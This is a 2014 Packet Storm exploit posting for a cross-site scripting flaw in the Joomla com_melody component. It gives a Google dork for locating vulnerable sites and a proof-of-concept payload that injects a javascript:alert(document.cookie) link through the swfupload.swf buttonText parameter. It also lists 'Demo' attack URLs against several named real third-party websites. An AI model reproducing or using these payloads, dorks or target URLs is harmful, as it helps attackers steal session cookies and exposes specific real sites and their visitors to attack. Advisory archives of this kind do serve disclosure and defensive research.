Joomla Melody Cross Site Scripting

2014-01-10T00:00:00
ID PACKETSTORM:124732
Type packetstorm
Reporter TUNISIAN CYBER
Modified 2014-01-10T00:00:00

Description

                                        
                                            `[+] Author: TUNISIAN CYBER  
[+] Exploit Title: Joomla Component com_melody XSS Vulnerability  
[+] Date: 09-01-2014  
[+] Category: WebApp  
[+] Google Dork: :inurl:"components/com_melody/"  
[+] Tested on: KaliLinux  
[+} Friend's blog: www.na3il.com  
  
########################################################################################  
+Exploit:  
The Joomla melody component suffers from an xss vulnerability.  
+P.O.C:  
127.0.0.1/[PATH]/components/com_melody/assets/swfupload/swfupload.swf?buttonText=<a href='javascript:alert(document.cookie)'>XSS</a>  
  
Demo:  
http://www.lachost.net/choir/components/com_melody/assets/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert%28document.cookie%29%27%3EXSS%3C/a%3E  
http://nettlys.no/components/com_melody/assets/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert%28document.cookie%29%27%3EXSS%3C/a%3E  
godsstream.com/~domain20/components/com_melody/assets/swfupload/swfupload.swf?buttonText=<a href='javascript:alert(1)'>XSS</a>  
  
./3nD  
########################################################################################  
Greets to: XMaX-tn, N43il HacK3r, XtechSEt  
Sec4Ever Members:  
DamaneDz  
UzunDz  
GEOIX  
########################################################################################  
`